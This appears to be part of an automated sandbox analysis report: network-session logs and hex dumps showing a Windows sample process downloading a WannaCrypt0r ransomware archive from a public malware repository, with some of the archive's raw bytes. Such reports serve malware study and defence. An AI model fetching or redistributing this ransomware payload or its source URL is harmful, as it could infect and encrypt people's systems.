                                                                                                                                                    2022-09-29 12:59:01 UTC4192INData Raw: 30 68 d1 4d 94 cc 33 41 8c 0a 6d 02 99 c1 b0 2e 8a 54 3c f5 68 86 59 9d a8 0b c5 d9 ad ce d8 c4 b4 f2 be b4 51 db 07 54 6a 90 a0 fe 3f f5 f3 6f e8 41 3b a7 ec ea 7d 54 86 bc 84 75 9e 24 a7 62 f8 ac c6 20 9b 86 5e 1d 35 4d 47 d7 7b f9 ca d1 ef 02 d0 22 d6 d1 1e 2c 91 8a 1b 49 52 ae cf 01 77 9b e4 26 b2 81 de 27 c1 6e 91 e6 2e 19 e9 5e 2c c2 94 6a a8 a2 a8 16 26 a9 da 2d 54 f3 95 be 76 ce a0 8d 42 ac 8f 35 5d 15 3a d7 e2 7f aa 61 3e 84 87 a7 6f ae 82 d2 f7 b3 24 e8 33 f4 22 a7 37 e5 2c 15 03 cf 3a 36 41 ac a3 1c e3 09 87 3a 2a 69 c9 29 6d d4 47 ab 0b fe dd 2d 01 dd f2 35 20 e6 d7 f3 f9 c6 87 b4 4c 82 67 59 c8 08 e5 ce 05 6a 2e 0f bc 4a 51 07 78 58 3c 7f c2 99 1f 84 3d 81 92 1c 19 67 86 18 14 ab 67 83 36 28 e9 3a 7e 16 4f a7 c4 6c 3a ea d8 e9 f3 07 98 2f c0
                                                                                                                                                    Data Ascii: 0hM3Am.T<hYQTj?oA;}Tu$b ^5MG{",IRw&'n.^,j&-TvB5]:a>o$3"7,:6A:*i)mG-5 LgYj.JQxX<=gg6(:~Ol:/
                                                                                                                                                    2022-09-29 12:59:01 UTC4192INData Raw: 7d f7 ca 32 ea 27 d2 bc 1e e4 9c ab 11 4a c7 57 d1 70 59 36 ff 67 21 93 81 d6 7a b6 03 15 bb 16 43 bb de 04 21 de 05 49 24 df d7 f7 c5 f3 73 0b b1 5e 57 76 7b e4 48 0a ec 53 18 24 51 09 ea b5 71 b0 7e 7e d9 74 7f 0c 74 45 11 87 de 68 d2 45 1a dd 9c 76 74 35 4c ad 89 ca a8 de cc a6 75 e5 3a 05 6c c9 67 7a 76 a6 83 17 89 c5 32 62 ad b6 c5 d5 3a c8 96 2c 45 c5 b6 29 98 8a 06 35 c9 4d c9 ca ff 73 81 6e e4 5c 72 cb 1a 9c ce 22 ba ec a7 bd 92 f7 41 40 1f eb 9f d2 3f 96 88 47 91 a2 f0 4e cc 49 d4 d8 53 75 fa 70 e8 6a 94 12 f4 6e 22 8a cc 5f 54 68 62 d1 41 2d 49 59 5a ce ea 6d 60 e0 6c cf 4c d5 9f e6 09 29 fa 5c f0 38 28 79 5c ea f5 b0 9b d1 bc 39 7b 17 b8 c5 2f b1 14 c4 37 52 ab 2b 62 3b 75 d1 c5 7f 64 a5 06 36 da e2 b7 fe c1 4e 0c 6c b0 e0 d0 7a 5f 5e 02 df 71
                                                                                                                                                    Data Ascii: }2'JWpY6g!zC!I$s^Wv{HS$Qq~~ttEhEvt5Lu:lgzv2b:,E)5Msn\r"A@?GNISupjn"_ThbA-IYZm`lL)\8(y\9{/7R+b;ud6Nlz_^q
                                                                                                                                                    2022-09-29 12:59:01 UTC4208INData Raw: d7 c6 57 03 d1 c3 93 8a f2 87 7f 02 7b c5 69 70 91 47 c3 d2 ba 5a 14 88 0c 97 61 07 a8 b9 46 fb 52 bb 40 05 8e 68 68 5e 6c 0b f2 f3 6c 76 9b 96 41 76 39 05 c1 ef 73 09 52 57 7e 2d 9e bf 8f 6e 5a 18 1e d1 47 d6 0b 18 3c d6 6c 8d 78 94 cc 7e 78 e4 60 58 9a f2 8c d1 be ff 81 07 81 1d 64 f0 29 98 e0 bd fc c9 d3 df 2e 9e 6a 9c fb c9 86 71 31 05 6a 46 b6 b6 3f f5 72 60 ee d0 9f 15 3f c5 27 7e 69 42 22 5a f7 7e 4b 1c da 54 12 ba 2f 5d a3 ab 48 45 80 d0 2d 86 d2 08 c2 e6 20 20 8a 73 31 d6 83 bd d7 9f d2 f9 2c 3e 92 25 c6 d2 29 65 11 03 18 5e 3c ff 0d 9e 79 61 0f 81 05 50 dc 1e 0d b7 c1 80 58 3e ee 1c 41 ee b5 8a e8 e0 02 e9 dd 12 1d ed c2 cd ea fe 2c 61 6e 52 ca 26 e5 66 95 41 4a 01 7f 9c eb f7 ec 6a fa 92 b1 9c 33 16 44 72 94 42 15 25 25 a9 07 b0 04 61 da c0 c3
                                                                                                                                                    Data Ascii: W{ipGZaFR@hh^llvAv9sRW~-nZG<lx~x`Xd).jq1jF?r`?'~iB"Z~KT/]HE- s1,>%)e^<yaPX>A,anR&fAJj3DrB%%a
                                                                                                                                                    2022-09-29 12:59:01 UTC4224INData Raw: 31 12 c9 20 11 d2 1c a4 da fd 18 4b 97 f9 9f 60 e9 8e 2b 34 ac f6 df 7d 71 99 78 54 4e 4c cc 69 bb c6 49 c4 79 68 ec bc b4 d8 78 71 70 17 af 5b 72 7e 9a 54 d4 a4 4f a4 10 46 8b 30 10 5d 24 94 c7 73 f3 d1 21 11 62 5c fe a0 3a b9 82 f6 6e 49 13 f7 84 d4 76 30 90 00 89 30 31 98 fb bb b1 49 2a 64 2e 90 2a e4 bb b0 50 4a f2 d3 9f e0 78 f0 91 48 79 21 86 87 8b 4e 13 eb c5 9c c1 07 26 b2 25 c7 95 1f b4 9e 6d 18 6e 73 25 56 d5 aa 29 a9 99 ef d8 40 83 86 0c aa a2 c8 63 73 c8 7f d3 b3 c3 05 2b e7 f9 55 2b af 35 44 03 39 82 49 5c 62 e4 ce 51 98 1a d4 bc 47 e2 36 2b fd 92 96 26 58 40 4d 51 67 0c 0e 7a b1 c2 64 09 37 70 96 4a 8f 61 c0 7b ae 93 24 94 7b 3a 2e ba ab 15 47 be 3d 1e 83 73 5a 8e 6a eb 41 65 5a 2c c5 08 49 57 d7 12 78 13 99 e0 d7 be 9f 60 e7 68 78 5c 3c 39
                                                                                                                                                    Data Ascii: 1 K`+4}qxTNLiIyhxqp[r~TOF0]$s!b\:nIv001I*d.*PJxHy!N&%mns%V)@cs+U+5D9I\bQG6+&X@MQgzd7pJa{${:.G=sZjAeZ,IWx`hx\<9
                                                                                                                                                    2022-09-29 12:59:01 UTC4240INData Raw: 2a 79 0c 8d 3e 14 e6 14 2d 43 6b 61 ef 0d 54 ff c4 35 2d aa 7b 7f bb b0 89 d6 25 7e 52 14 8b 53 6f fa cb ed 1e c2 cf f8 39 87 dc 22 ff 9c c3 73 e6 c3 7a 25 00 95 ca a5 98 5d 45 7c f1 6e 03 d8 0e a3 52 4f 8d 9d f0 10 51 7c 1b 3f 75 23 c3 b5 53 9d 04 a1 54 14 22 c8 f2 5c 0a 85 80 2b 19 40 f6 fd 47 87 a1 dc d3 12 74 67 2d 7c 35 8a af e4 78 f4 dc 42 50 e8 7d 6a 14 63 80 20 b5 2c 0c 6c ed 6b 0e d9 72 3a bc c6 59 91 39 e4 e2 84 75 07 a4 31 93 e7 60 09 68 39 d2 c9 f6 07 f0 83 ef a4 15 f8 c0 96 88 6d 08 3d 23 e1 a0 ee 8e b3 cc 77 c5 64 5e b9 55 07 3f e4 4c 53 7a 23 99 fa 5d bc 3d 89 7c d0 7e d4 9d 49 71 a8 e2 56 86 8f 62 52 b4 45 35 da 93 74 88 86 82 fb 91 ef 9a 2d 7e 84 a1 3a 1b c6 2a ea d1 f0 8a 08 9e ff b8 f1 a6 ae 9b 6e 74 1f 97 da 38 df 5b da a2 f2 22 5c 3f
                                                                                                                                                    Data Ascii: *y>-CkaT5-{%~RSo9"sz%]E|nROQ|?u#ST"\+@Gtg-|5xBP}jc ,lkr:Y9u1`h9m=#wd^U?LSz#]=|~IqVbRE5t-~:*nt8["\?
                                                                                                                                                    2022-09-29 12:59:01 UTC4256INData Raw: ac 83 86 92 f5 d3 d4 1a 67 b2 69 16 fd 26 e4 d6 3f f0 20 f8 46 d7 75 ed e0 75 9d c6 74 d5 8d 80 73 7e 71 0a 32 6f ca dc 76 70 6d 6a f0 15 1f 50 b2 af 4e 0e 19 d8 9b be 5d a3 b0 8b 96 d4 12 60 cb f2 30 ba d4 9e c3 35 51 bb e0 af 55 f2 41 8a 11 98 a4 8c aa 38 41 36 58 f4 b9 6c 11 0e 29 dd 61 d3 77 15 03 6c c2 6a b7 d1 48 8a d4 1f 65 dc 82 6b b0 83 93 77 47 6b 76 9b d6 a5 0c ce ca c7 4a d3 c4 e2 62 b3 69 ae 48 3b 18 ed 4b 5a 85 39 34 3c ee 48 14 4a 35 ef 48 fb 61 80 91 7d bc 96 a5 66 16 9f 2e a2 ca 23 21 ec 54 e8 86 41 c1 e9 e0 8f d2 d2 0c 54 92 0a 40 8c 3d 62 27 b2 33 bc 7f 57 6a 51 89 09 c9 5c 19 11 f0 e2 20 66 36 cb 9e 34 17 35 cc 7d 19 78 f0 91 79 df 91 dc cc 59 51 a6 b4 a9 12 2e ba 73 05 e6 23 2f ac 1b 18 f2 ac ce 51 e3 f1 63 fa a8 bb b1 b2 6f f7 f9 2b
                                                                                                                                                    Data Ascii: gi&? Fuuts~q2ovpmjPN]`05QUA8A6Xl)awljHekwGkvJbiH;KZ94<HJ5Ha}f.#!TAT@=b'3WjQ\ f645}xyYQ.s#/Qco+
                                                                                                                                                    2022-09-29 12:59:01 UTC4272INData Raw: 78 b7 97 32 c4 37 22 27 06 d3 98 c3 b8 93 ad 01 94 c7 2b 29 8a 09 db 95 c4 24 c4 60 ec 2a 33 af c3 4b 86 55 6c 3f 37 0a 0f 1f 12 06 9e e8 ed 7a 8a ec fb bc 72 f7 f9 c4 b0 86 cf 3f f9 6c 0f 72 f6 ab 6a a0 7a 3b 08 d4 38 77 5e 78 ec 3a 13 1e c7 59 be 38 65 d3 04 d6 52 ed 54 99 8b 83 7f ee 80 4f 4c 90 b1 40 b4 cc 81 22 15 dd 5e 28 c6 aa a7 eb e0 de 4a 99 b8 bd 98 f3 43 5c 28 25 ff 52 5d 07 e3 0d 5e 9c 94 72 96 65 3a 81 1a 41 62 93 f1 e2 f0 80 f8 b0 6a d5 dc 27 9e 81 61 87 4a 73 54 96 e3 2f 02 a7 54 da e3 ab 00 ad 3a 0b 9c 01 7f 51 b0 05 72 d2 a0 cc 33 bc c7 81 10 cd 6e 10 e8 de ea 44 30 e0 5c 3c 91 77 9c 21 02 85 1f 14 63 c3 19 3b ce cb b3 1c 81 de a0 2f 31 b9 71 ba 26 d8 ef 8d 47 de 45 e4 e0 3a c2 41 d3 1c 79 e6 3e 0c 32 99 e9 1c b1 5f 3a b6 e3 66 4a c9 ec
                                                                                                                                                    Data Ascii: x27"'+)$`*3KUl?7zr?lrjz;8w^x:Y8eRTOL@"^(JC\(%R]^re:Abj'aJsT/T:Qr3nD0\<w!c;/1q&GE:Ay>2_:fJ
                                                                                                                                                    2022-09-29 12:59:01 UTC4288INData Raw: 18 90 c9 dc 7c 8c f4 20 19 89 9e a7 9b a6 53 4e d3 c3 bf 56 a3 92 a6 35 69 33 0f ff 81 ce 4b 35 7d f3 16 24 a7 f9 a2 6e 8b 60 1c 36 29 4e 9e 41 de cd 52 23 8e db 80 12 ec 62 bd d7 f6 35 fa f2 89 69 e1 c8 77 30 3f dc 12 43 b1 3b 35 9c 73 08 d5 16 3f f7 46 41 53 0c 3c 93 98 f9 42 02 fc e1 61 9e 1e 10 7b 1e b7 db 4b 6f e5 65 d6 2a c1 6e 66 c8 81 a2 fe 59 da de 46 f9 16 f3 e2 78 72 74 81 dd 9e 69 3b 36 9f da b3 48 9d 14 21 65 b1 75 82 bc 09 ff d9 db 48 9e 27 fc 73 97 cc a8 51 13 1a e5 de ae c7 bf 59 29 87 c2 4c 6b 22 a8 3f f1 51 3e 59 f2 b5 f9 c7 62 dc 94 6a 8a da f3 7c 52 78 ee 84 14 bb d0 92 d3 04 f0 b3 51 fb cd e9 ac 10 36 9a 25 eb 2d 91 ca 82 c8 e9 df 8f f1 5c 17 e8 9b 3c 0d 07 b1 ba 28 91 23 87 8f b8 90 74 06 81 fb 99 0c 9e d9 c5 12 86 06 c9 3c 27 48 d8
                                                                                                                                                    Data Ascii: | SNV5i3K5}$n`6)NAR#b5iw0?C;5s?FAS<Ba{Koe*nfYFxrti;6H!euH'sQY)Lk"?Q>Ybj|RxQ6%-\<(#t<'H
                                                                                                                                                    2022-09-29 12:59:01 UTC4304INData Raw: 03 ad 3d db 62 96 de 80 a6 2e ad 54 6e a9 18 f6 d4 e7 58 c3 a9 25 08 04 f3 23 81 57 6f 8d 15 4b 0d 00 03 38 79 b2 79 64 c8 bb 62 88 2f 18 a5 a1 9c b2 24 b3 08 82 e4 7d 27 2b eb e6 d2 e5 17 fb 47 59 d4 97 b6 5a 8b f1 e1 82 d4 03 01 46 26 a7 f5 8c 8f c7 7e e2 69 72 e8 0f 67 f3 d5 03 8b ab 2b ca 14 75 92 c6 a1 9c ad 09 5a 7d fa 4c 20 aa 36 39 83 76 05 7f 20 b0 b4 46 cd ad 04 62 7b 5c ed 8d 2d 0a af 00 71 cc 7f ca e4 75 cf e2 c1 13 ee 11 0a 6a 5f bf f7 22 d1 b7 df 85 91 4e a1 3b 69 3d 6d 57 95 67 aa 3a 33 da ad 0d f2 de d6 1a 99 ab 5d d3 73 18 e0 f1 3d 5f 09 5c 11 fd eb fa fa 1b 79 c3 2f 8c 02 51 5f 92 4e b2 71 e0 0e e3 55 24 41 ae 04 c2 3f fa cc d4 eb 9c c2 dd 22 50 b9 e2 c1 f3 7e e1 49 d0 1a c3 94 dc 8d 83 cf 24 09 b5 ae 7e 99 91 10 6d a5 ac b3 bf a5 cf da
                                                                                                                                                    Data Ascii: =b.TnX%#WoK8yydb/$}'+GYZF&~irg+uZ}L 69v Fb{\-quj_"N;i=mWg:3]s=_\y/Q_NqU$A?"P~I$~m


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    53192.168.2.349734140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:01 UTC4309OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    54140.82.121.3443192.168.2.349734C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:02 UTC4309INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:08 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:02 UTC4310INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    55192.168.2.349735185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:02 UTC4312OUTGET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    56185.199.108.133443192.168.2.349735C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:02 UTC4312INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 3477754
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "f2d2308d5c9c4012fb553c82b7938a4339a5db5e022f0a058ece1b06d8a727b6"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0809:67C0:101C7CA:1115ED1:6335934B
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:02 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6958-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456342.115015,VS0,VE188
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: d423273b74d22601db878da3a6470fc0d49e4d6c
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:02 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:02 UTC4313INData Raw: 50 4b 03 04 14 00 01 00 08 00 ac a3 ad 4a aa fc 22 40 3e 10 35 00 00 a0 35 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 57 61 6e 6e 61 43 72 79 70 74 30 72 2e 65 78 65 6f 0f db 68 af 01 aa 98 b9 37 e0 93 e8 38 9b 1c 5d 92 7d 1d 81 21 e7 ab 1c 27 cd f4 c9 34 aa 90 bb 64 6c d1 0e 57 d5 03 fa a7 d3 a2 dc 6e 89 67 e9 31 78 19 3b 1f 1d 3a d2 b0 d0 24 57 d4 e1 c6 b3 29 40 d4 13 5d 74 20 b1 b5 85 73 bf 49 ef af a4 c9 4a 92 ab c7 42 0c 3a 9a 7c 98 66 63 4a 0d b6 d9 48 74 53 83 cb 7d 19 58 00 15 50 65 b6 b2 30 8c 14 06 ae e7 66 35 55 df f2 16 2f 88 d0 5e 40 78 9b 4f 9d 09 80 69 94 b2 d3 ca 12 63 f2 d8 fe d2 3a 6e 6f f0 89 ce 22 6d df 96 4f c5 24 c8 8c 8c 8d 2e 85 cc 02 e0 3c 1c fc 48 1b df 66 24 a3 96 9b 30 a0 a8 47 81 f7 56 19 44 83 a0 79 e6 99 0e 57 6e e9 01
                                                                                                                                                    Data Ascii: PKJ"@>55Endermanch@WannaCrypt0r.exeoh78]}!'4dlWng1x;:$W)@]t sIJB:|fcJHtS}XPe0f5U/^@xOic:no"mO$.<Hf$0GVDyWn
                                                                                                                                                    2022-09-29 12:59:02 UTC4314INData Raw: 91 f8 c1 77 dc 6b 6d b2 2f 09 2e b8 0a ce 32 a8 88 cf 1e 7e 8f ce b6 d4 d0 df 58 c6 fe 47 46 8d 5e 84 d0 1e ca 7f a4 1a 15 4d bb 03 60 a3 3f 1a 45 ca ca 6a 20 6b 7d 58 65 5a e5 1b c7 59 31 24 91 53 1f 77 27 f1 b4 66 fc 10 21 39 75 03 ec 5e f2 8f 52 1e 26 c4 45 29 b1 c7 1c 80 79 c6 a8 93 75 d6 71 68 d3 c3 f4 8b 4a cd af 65 73 f1 47 72 25 c6 d4 26 6b db b4 62 3d 09 46 3a 82 b9 35 32 aa b1 30 4b 40 4c 1a 7a c4 a0 68 b2 17 04 ac bd 81 99 6c ea 0a 9b c2 1f 58 12 a5 17 f5 81 13 cc e6 8a 9e 43 c8 e9 3b 86 4a 79 fb f0 a9 10 c5 5d bd 55 dc 70 df bb 48 eb 5c e2 0b 7f 79 e8 41 b4 0e 12 c4 b4 e2 5c db e8 9e 21 48 fc a0 99 9d e8 bd 4d 5d d8 ae 0a 6f fd 08 09 0b 07 82 80 f8 10 91 6d 86 0f 24 15 15 e9 cc 5a ca c1 9f 61 38 b0 b3 43 36 40 1a 6c ed a0 f7 53 ea 0b ce 8b dd
                                                                                                                                                    Data Ascii: wkm/.2~XGF^M`?Ej k}XeZY1$Sw'f!9u^R&E)yuqhJesGr%&kb=F:520K@LzhlXC;Jy]UpH\yA\!HM]om$Za8C6@lS
                                                                                                                                                    2022-09-29 12:59:02 UTC4315INData Raw: 69 a7 34 58 c8 26 c9 45 fd 9b d7 12 19 4c ab 25 7c 39 96 5a 5f ef 33 68 66 e1 15 40 2c 93 bd c2 ef 05 68 3b fd 3d 1a f1 5a a0 42 0d 7b 7e 82 d4 85 bb 56 32 bf 93 f1 d4 62 af 6b 16 73 61 9b c1 78 fb 53 95 ce 27 0e e5 88 05 a1 38 a0 a0 e6 e0 f1 85 a4 2e f0 b8 9d ce f0 88 e1 09 b2 62 bd a9 13 d5 67 f2 4d e4 28 c0 35 f1 fb 27 e9 24 e3 dd 50 7f e4 e1 0a d8 50 95 24 ea d2 d7 93 76 3a 0f bf 55 e4 5b 79 ef 96 aa fc fe 9f f7 f4 5c 01 86 e9 e0 59 cb 0b 05 f3 b3 85 f4 09 b9 37 bc 7f 36 48 4c de f6 79 63 48 9c d8 b1 83 37 68 65 a3 1f 08 bb 37 39 ca 5b 82 9c 1e fa d5 46 99 69 fa 88 70 e9 f6 da 58 93 9a 36 b3 ce e7 fe 78 b9 2c ca bf 07 96 63 73 cc e7 ab d7 ce 0c 1b 80 53 bf 28 74 65 7e f5 e0 fc 21 33 ce 4e d2 03 b5 9f 58 8f 3c 49 f8 c4 ba ca e7 5c d6 e3 4b ba 1e 62 f6
                                                                                                                                                    Data Ascii: i4X&EL%|9Z_3hf@,h;=ZB{~V2bksaxS'8.bgM(5'$PP$v:U[y\Y76HLycH7he79[FipX6x,csS(te~!3NX<I\Kb
                                                                                                                                                    2022-09-29 12:59:02 UTC4317INData Raw: a1 1e ee 3e 04 80 cf b7 6b 88 54 63 cc 38 af 0f b1 83 ad 99 0a 42 d3 46 05 e2 f5 0f f2 2e cb 25 eb 1a a9 f9 50 af 2d 51 d8 19 2c cd 70 b2 0e 22 86 c0 ab 96 ec 3d 8b de 58 6d 9c e5 cc 0d 35 7b f5 22 ec 74 fc 39 92 07 02 8a 3d 8a 13 51 22 2b 0f 77 0e 85 7e eb 06 c4 1f a8 bb 61 90 c1 9a b6 95 51 62 72 aa 95 27 1a b3 71 d3 ec 7f 88 01 33 a2 3c e5 c4 25 70 8b 57 e8 ad c8 38 15 30 dc 4c 36 25 a8 f8 74 be 29 61 c3 1b b8 3c fa 79 51 f2 33 cc 94 87 a1 c2 f9 88 63 ae ae 57 4b 7e 6e 85 0e a0 d4 66 74 b4 4d 2e a1 3f 59 06 29 59 8e c0 0b e3 71 19 b2 72 5a 91 12 b0 6e 5c af 21 54 df d0 51 31 84 5d 55 08 41 c9 03 e6 6c 6e 27 f1 7c 17 df aa d9 21 45 21 73 52 3f 58 cf 3c 14 56 79 f8 0a f1 9a 86 81 d6 2f 75 69 a6 9d 22 12 50 cf 02 12 bd a6 0c 95 5c a2 18 e1 60 49 f2 ea 52
                                                                                                                                                    Data Ascii: >kTc8BF.%P-Q,p"=Xm5{"t9=Q"+w~aQbr'q3<%pW80L6%t)a<yQ3cWK~nftM.?Y)YqrZn\!TQ1]UAln'|!E!sR?X<Vy/ui"P\`IR
                                                                                                                                                    2022-09-29 12:59:02 UTC4318INData Raw: a2 aa 37 1a a7 78 8d a5 c4 e9 41 72 05 b3 a8 94 89 72 bf d2 0a 42 26 14 ed f5 cb 27 93 f4 f7 a5 d5 c9 c4 b0 9f d9 d8 26 a8 da a0 b6 1b 50 04 8f 98 aa 78 38 80 1f 8e 33 02 18 92 fb 6d 8e 4f 30 97 b5 2f 0b a7 d9 67 76 f4 5a cb 0b 88 34 1e 29 aa ad f2 b5 51 da 5a 48 51 87 00 7d 4f a4 23 1c ad f8 b8 4c 2b 7b 7c f6 a3 7a 91 ec 8f 51 d4 2f 12 5a 6c 39 af f2 ea f5 20 52 fa 68 f0 25 b6 0b 9a 76 2d 2c d4 a7 2f 0c 4f 97 9f 5d a0 ff d9 6f 93 4f a9 c3 d4 39 ba 43 e2 43 f7 48 3f cb 35 79 f2 71 ec 52 57 be cf 44 47 4a 03 8f 77 10 59 49 c1 82 1b 9f 0b ff f4 3d da 4b 9e 4c b1 16 4d 54 2d 3e 67 e8 92 b2 97 29 ba dc cc 5f 2f 1c 4c e9 9e de 16 c8 fc 41 27 7a 0c 2d 80 73 73 a8 c2 d6 9b fa 5c 0c 74 76 5c 88 ec ad 46 c3 06 51 89 47 24 52 9d 1f be 9b 96 f6 0b 80 7b 06 de 99 40
                                                                                                                                                    Data Ascii: 7xArrB&'&Px83mO0/gvZ4)QZHQ}O#L+{|zQ/Zl9 Rh%v-,/O]oO9CCH?5yqRWDGJwYI=KLMT->g)_/LA'z-ss\tv\FQG$R{@
                                                                                                                                                    2022-09-29 12:59:02 UTC4319INData Raw: 17 47 91 aa 35 df 95 48 e2 3f 1c 22 59 8e ae 84 2d c4 99 90 d5 d1 01 71 c1 e0 e0 bf e9 a2 7d f2 01 25 9f 42 6e e5 0c e4 4b 61 d1 41 c8 42 55 c4 1a d7 bf bc 43 d5 f7 1f 58 16 32 9d 2c 3f c7 d8 d0 00 93 15 85 8e 5b 2e 99 fb 4c 67 39 e6 54 6b ff 33 e4 6b 67 b2 dc 8e bf b6 02 56 4c e4 4d 47 1f cf d3 40 a6 d5 11 18 0a a5 90 32 47 f5 b9 1e d4 f7 72 99 05 20 15 a9 d2 68 c9 88 61 bb 3f 38 62 5e fa 76 01 e2 5e 84 7a 7e 0a e9 1d 25 9c 68 04 fd 61 82 62 8c c2 35 26 95 69 39 e3 a8 18 73 6c 90 60 e8 1b e2 62 f6 75 0e 8c 46 b5 af 1c ca 26 20 0d 8f a5 a9 68 1a 15 96 69 32 26 4e c5 18 9e 1f 56 6b bc 36 8e bf c7 b6 e5 b5 21 47 55 ab 31 0e ab 78 f8 58 a3 ae a8 a4 52 1d d1 69 63 04 4f 50 68 2b d9 55 f8 d6 40 f4 db 7d 97 b1 32 93 95 51 47 a2 8b 94 40 98 b6 77 51 be 5b b9 5c
                                                                                                                                                    Data Ascii: G5H?"Y-q}%BnKaABUCX2,?[.Lg9Tk3kgVLMG@2Gr ha?8b^v^z~%hab5&i9sl`buF& hi2&NVk6!GU1xXRicOPh+U@}2QG@wQ[\
                                                                                                                                                    2022-09-29 12:59:02 UTC4321INData Raw: bf 4f ed 17 76 44 c7 04 26 f6 75 98 1f 82 00 1b d3 7a 4f df 2e 1e 64 5d 06 20 f2 aa d3 af 93 46 1a ed 33 fb 3f 37 fe 5a ab 04 e7 48 57 66 0b db 57 e1 9b cf cf 72 14 18 7a 3e 8d a4 6d 28 77 59 68 d8 26 a8 8e bd b9 20 7b b3 6f 6a 08 8f d9 e4 42 d9 78 9c b7 44 9a ef 53 54 69 bd ea e7 8d 54 f4 2c d7 73 80 ec c9 10 46 5e 20 0e 55 2d 4e 87 d8 21 b8 b6 c3 68 a6 fa 43 36 02 7a e2 e4 3b ce 9d 56 ce 80 0f cd 4b e7 fd 73 6a af a4 14 e6 6a ee c0 90 88 1b fb 06 bc fe 49 b5 8a e4 31 fd 7f c0 29 1e 47 7c 87 c8 ac e1 65 93 0c a6 04 6f cb b1 f8 bb c3 2f e2 a7 e8 a8 e0 3f d1 64 cd 80 32 0b 56 61 4b 62 de 4c 9e 48 87 15 05 b2 fc 97 7d bf 2c 07 8f cc bb 25 42 b9 ec d2 c8 03 ac 19 2c b0 55 ee 6f 8e dd a5 a6 b4 33 5b 22 19 09 d3 77 13 c7 40 ee b2 f8 af 38 fd 82 8a b4 01 fc c4
                                                                                                                                                    Data Ascii: OvD&uzO.d] F3?7ZHWfWrz>m(wYh& {ojBxDSTiT,sF^ U-N!hC6z;VKsjjI1)G|eo/?d2VaKbLH},%B,Uo3["w@8
